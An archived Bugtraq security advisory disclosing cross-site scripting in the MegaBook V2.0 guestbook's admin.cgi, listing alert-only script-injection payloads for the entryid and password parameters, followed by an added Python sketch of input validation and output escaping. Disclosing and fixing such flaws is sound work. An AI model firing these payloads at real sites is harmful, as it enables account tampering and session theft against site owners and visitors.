Bugtraq mailing list archives

MegaBook V2.0 - Cross Site Scripting Exploit
From: Spy Hat <spyhat () spyhat com>
Date: 5 May 2005 10:45:51 -0000



The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected script is admin.cgi.

URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) 

I have tested the script with the following query:

?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;

I have also tested the script with these POST variables:

action=modifypost&entryid=66&password=&lt;script&gt;alert('wvs-xss-magic-string-188784308');&lt;/script&gt;

action=modifypost&entryid=66&password='>&lt;script&gt;alert('wvs-xss-magic-string-486624156');&lt;/script&gt;

action=modifypost&entryid=66&password=">&lt;script&gt;alert('wvs-xss-magic-string-1852691616');&lt;/script&gt;

action=modifypost&entryid=66&password=>&lt;script&gt;alert('wvs-xss-magic-string-429380114');&lt;/script&gt;

action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;


Yours,
SpyHat
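As an added illustration of the mitigation (not part of the original post and not MegaBook's code), the sketch below shows how a handler for `action=modifypost` can validate `entryid`, avoid echoing `password`, and HTML-encode any text it writes back. The function names, the `text` field and the probe strings are assumptions constructed for this example.

```python
import html
import re

# Constructed probes modelled on the context-breaking prefixes in the report
# (attribute quotes, a bare '>', and a closing </textarea>).
PROBES = [
    "<script>alert('x')</script>",
    "'><script>alert('x')</script>",
    "\"><script>alert('x')</script>",
    "><script>alert('x')</script>",
    "</textarea><script>alert('x')</script>",
]

def esc(value):
    """Encode &, <, >, " and ' so the value stays data in element text,
    textarea content and quoted attribute values."""
    return html.escape(value, quote=True)

def parse_entry_id(raw):
    """Accept only a short decimal id; anything else is rejected, not echoed."""
    return int(raw) if re.fullmatch(r"[0-9]{1,9}", raw or "") else None

def render_modify_form(entryid_raw, password_raw, text_raw=""):
    """Hypothetical stand-in for the modifypost page of an admin CGI."""
    entry_id = parse_entry_id(entryid_raw)
    if entry_id is None:
        return "<p>Invalid entry id.</p>"  # fixed text, no reflection
    # password_raw is only ever compared server-side; it is never written back.
    return (
        '<form method="post" action="admin.cgi">\n'
        '<input type="hidden" name="action" value="modifypost">\n'
        f'<input type="hidden" name="entryid" value="{entry_id}">\n'
        '<input type="password" name="password" value="">\n'
        f'<textarea name="text">{esc(text_raw)}</textarea>\n'
        '</form>'
    )

def still_active(page):
    """True if the page contains a script tag or an extra textarea close."""
    lowered = page.lower()
    return "<script" in lowered or lowered.count("</textarea>") > 1

if __name__ == "__main__":
    for probe in PROBES:
        pages = (render_modify_form(probe, ""),
                 render_modify_form("66", probe, probe))
        print([still_active(p) for p in pages], repr(probe))
```
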

